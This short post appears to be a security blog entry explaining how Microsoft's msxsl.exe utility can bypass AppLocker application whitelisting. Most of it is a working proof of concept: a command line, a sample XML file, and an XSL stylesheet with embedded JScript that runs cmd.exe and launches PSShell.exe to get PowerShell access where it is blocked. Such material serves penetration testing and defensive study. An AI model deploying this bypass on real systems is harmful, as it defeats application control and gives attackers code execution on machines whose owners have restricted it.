AppLocker Bypass – MSXSL

According to Microsoft the msxsl.exe command line utility enables the user to perform command line Extensible Stylesheet Language (XSL) transformations by using the Microsoft XSL processor. However this binary can be used execute malicious JavaScript code and bypass application whitelisting protections. This was discovered by Casey Smith and proof of concept was shared with the community over twitter.

The msxsl utility accepts XML and XSL files. The following needs to be executed from the command line in order to run JavaScript code:

msxsl.exe customers.xml script.xsl

customers.xml

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>

script.xsl

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<msxsl:script language="JScript" implements-prefix="user">
   function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k C:\\PSShell.exe");
   return nodelist.nextNode().xml;

   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

The utility needs to be run from a location on the system that the user has permission to execute. The same applies and for the untrusted binary PSShell which will provide PowerShell access even if PowerShell has been blocked by AppLocker.